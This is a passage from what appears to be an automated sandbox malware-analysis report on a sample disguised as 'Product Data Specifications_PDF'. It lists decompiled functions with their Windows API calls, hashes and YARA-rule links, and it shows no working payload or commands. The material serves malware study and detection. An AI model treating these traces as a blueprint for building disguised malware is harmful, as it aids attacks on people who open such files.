                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CapsDevice$Release
                              • String ID:
                              • API String ID: 1035833867-0
                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                              • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                              Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0041708E
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __amsg_exit.LIBCMT ref: 004170AE
                              • __lock.LIBCMT ref: 004170BE
                              • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                              • _free.LIBCMT ref: 004170EE
                              • InterlockedIncrement.KERNEL32(017317F0), ref: 00417106
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                              • String ID:
                              • API String ID: 3470314060-0
                              • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                              • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                              • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                              • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                              Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                              • String ID:
                              • API String ID: 3495660284-0
                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                              • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                              Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Virtual
                              • String ID:
                              • API String ID: 4278518827-0
                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                              • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                              Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                              Download Yara Rule
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 442100245-0
                              • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                              • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                              Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                              • _wcslen.LIBCMT ref: 0045F94A
                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                              • String ID: 0
                              • API String ID: 621800784-4108050209
                              • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                              • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                              • Opcode Fuzzy Hash: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                              • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                              Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SetErrorMode.KERNEL32 ref: 004781CE
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • SetErrorMode.KERNEL32(?), ref: 00478270
                              • SetErrorMode.KERNEL32(?), ref: 00478340
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$AttributesFile_memmove_wcslen
                              • String ID: \VH
                              • API String ID: 3884216118-234962358
                              • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                              • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                              • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                              • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                              Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                              • IsMenu.USER32(?), ref: 0044854D
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                              • DrawMenuBar.USER32 ref: 004485AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Item$DrawInfoInsert
                              • String ID: 0
                              • API String ID: 3076010158-4108050209
                              • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                              • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                              • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                              • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                              Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 1589278365-1403004172
                              • Opcode ID: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                              • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                              • Opcode Fuzzy Hash: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                              • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                              Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                              • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                              • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                              • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                              Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                              Download Yara Rule
                              APIs
                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                              • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                              • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                              • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                              Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: SysAnimate32
                              • API String ID: 0-1011021900
                              • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                              • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                              • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                              • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                              Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                              • GetFocus.USER32 ref: 0046157B
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                              • __swprintf.LIBCMT ref: 00461608
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                              • String ID: %s%d
                              • API String ID: 2645982514-1110647743
                              • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                              • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                              • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                              • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                              Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                              • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                              • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                              • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                              Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
